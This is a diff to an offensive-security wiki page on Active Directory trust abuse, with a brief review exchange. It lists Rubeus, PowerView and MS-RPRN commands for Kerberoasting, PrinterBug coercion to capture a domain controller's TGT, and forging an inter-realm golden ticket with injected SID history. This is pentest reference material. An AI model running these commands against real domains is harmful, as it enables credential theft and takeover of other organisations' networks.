ad/movement/trusts.md

```diff
@@ -198,6 +208,83 @@ When doing NTLM authentications across trusts, the trusting domain's domain cont
+2.2 Use Get-DomainForeignGroupMember -Domain OTHER.DOMAIN to see if groups in those other forest domains had “incoming” access.
+2.3 Kerberoasting `.\Rubeus kerberoast /domain:eu.local /nowrap`
+
+### Inter-Forest Cross-Domain Attack (Different Domains in Different Forests)
+#### Bidirectional Inter-Forest Cross-Domain Attack (FOREST_TRANSITIVE, Bidirectional)
+In that specific case, THE FOREST IS NOT A SECURITY BOUNDARY.
+We may be able to abuse the KUD of the compromised domain's DC (or other machine with similar privileges) and coercing the target domain's DC to authenticate to it using PrinterBug to steal the TGT of the target DC's machine account.
+- Monitor for tickets at the compromised DC: `.\Rubeus.exe monitor /interval:5 /targetuser:usvendor-dc$ /nowrap`
+- Coerce the target DC to authenticate to the compromised DC: `.\MS-RPRN.exe \\usvendor-dc.usvendor.local \\techcorp-dc.techcorp.local`
+#### Bidirectional Inter-Forest Cross-Domain Attack with Fully Implemented SID Filtering (FILTER_SIDS, Bidirectional)
+1. Enumerate for Local Group Membership on individual servers.
+2. Enumerate for Foreign Security Principals on the target domain: `Get-DomainForeignGroupMember -Domain OTHER.DOMAIN`
+3. Enumerate for Foreign ACL Principals: `Find-InterestingDomainAcl -Domain OTHER.DOMAIN -ResolveGUIDs`
+4. Kerberoasting `.\Rubeus kerberoast /domain:eu.local /nowrap`
+#### One-Way Inter-Forest Cross-Domain Attack (FOREST_TRANSITIVE, Inbound)
+1. Enumerate for Local Group Membership on individual servers.
+2. Enumerate for Foreign Security Principals on the target domain: `Get-DomainForeignGroupMember -Domain OTHER.DOMAIN`
+3. Enumerate for Foreign ACL Principals: `Find-InterestingDomainAcl -Domain OTHER.DOMAIN -ResolveGUIDs`
+4. Kerberoasting `.\Rubeus kerberoast /domain:eu.local /nowrap`
+#### Bidirectional External Cross-Domain Attack with SID Filtering (TREAT_AS_EXTERNAL,FOREST_TRANSITIVE, Bidirectional)
+1. Enumerate for Local Group Membership on individual servers.
+2. Enumerate for Foreign Security Principals on the target domain: `Get-DomainForeignGroupMember -Domain OTHER.DOMAIN`
+3. Enumerate for Foreign ACL Principals: `Find-InterestingDomainAcl -Domain OTHER.DOMAIN -ResolveGUIDs`
+4. Kerberoasting `.\Rubeus kerberoast /domain:eu.local /nowrap`
+5. Find Interesting Domain Groups with SID-extention>1000 that could be used for SID History injection, in order to obtain the privileges of that group on the target domain. In order to abuse that, we will need the `targetdomain$` credentials of the compromised domain. `.\Rubeus.exe golden /rc4:629b1eaa7ec6cfe2f4943a853ad6b36b /domain:eu.local /sid:S-1-5-21-3657428294-2017276338-1274645009 /sids:S-1-5-21-4066061358-3942393892-617142613-1103 /user:Administrator /service:krbtgt /target:euvendor.local /nowrap`
+#### Bastion Forests
+Look for a way to compromise the Bastion (Red) forest in order to easily gain access over all the managed Production forests.
+
```

Comment:
This should be removed and the sentence should be added as intro of the bastion / red forest section

Reply:
Completed!